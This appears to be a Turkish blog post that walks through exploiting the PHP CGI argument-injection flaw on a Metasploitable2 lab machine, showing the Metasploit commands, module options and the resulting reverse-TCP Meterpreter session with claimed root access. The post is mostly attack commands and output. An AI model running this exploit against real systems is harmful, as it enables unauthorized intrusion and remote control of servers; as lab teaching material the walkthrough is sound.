Ekim 19, 2021
11 11 11 ÖÖ
TCP nedir ? Aktarım Katmanı 2
Aktarım Katmanı Tcp Nedir
Yönlendirme Nedir 2 ?
Yönlendirme Nedir ?
Ağ Katmanı Nedir 2 ?
Ağ Katmanı Nedir ?
Veri Bağı Katmanı Nedir 2 ?
Android Studio Nasıl Kurulur ?
Veri Bağı Katmanı Nedir ?
Fiziksel Katman Nedir ?
Son Yazılar
TCP nedir ? Aktarım Katmanı 2 Aktarım Katmanı Tcp Nedir Yönlendirme Nedir 2 ? Yönlendirme Nedir ? Ağ Katmanı Nedir 2 ? Ağ Katmanı Nedir ? Veri Bağı Katmanı Nedir 2 ? Android Studio Nasıl Kurulur ? Veri Bağı Katmanı Nedir ? Fiziksel Katman Nedir ?
metasploitable2 exploit

PHP CGI Nedir ?

Paylaşım , Takip İçin

PHP CGI ile kullanıcı ile sunucu arasında etkileşimde kullanılan bir modüldür. Kullanıcı tarafından gönderilen istekler ile sunucu tarafında iş yaptırılır.




msf6 > search php cgi

Matching Modules
================

# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution
1 exploit/linux/http/cayin_cms_ntp 2020-06-04 excellent Yes Cayin CMS NTP Server RCE
2 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
3 exploit/unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution
4 exploit/multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution
5 exploit/linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow
6 exploit/multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution
7 exploit/linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection
8 exploit/multi/fileformat/archive_tar_arb_file_write 2020-11-17 excellent No PEAR Archive_Tar 1.4.10 Arbitrary File Write
9 exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection
10 exploit/windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow
11 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation


Interact with a module by name or index. For example info 11, use 11 or use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc

msf6 > use 9
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

Name Current Setting Required Description
—- ————— ——– ———–
PLESK false yes Exploit Plesk
Proxies no A proxy chain of format type:host:p
ort[,type:host:port][…]
RHOSTS yes The target host(s), range CIDR iden
tifier, or hosts file with syntax ‘
file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing conn
ections
TARGETURI no The URI to request (must be a CGI-h
andled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and paddin
g (0 for minimum)
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.138.128 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
— —-
0 Automatic


msf6 exploit(multi/http/php_cgi_arg_injection) > set rhost 192.168.138.129
rhost => 192.168.138.129
msf6 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 192.168.138.128:4444
[*] Sending stage (39282 bytes) to 192.168.138.129
[*] Sending stage (39282 bytes) to 192.168.138.129
[*] 192.168.138.129 – Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:45111) at 2021-05-29 15:45:39 +0300

meterpreter >

Sisteme root haklarıyla giriş yapılmıştır. 
Dilerseniz Meterpreter komutlarına bakabilirsiniz . 

Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

1 Yorum
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

[…] php […]

1
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: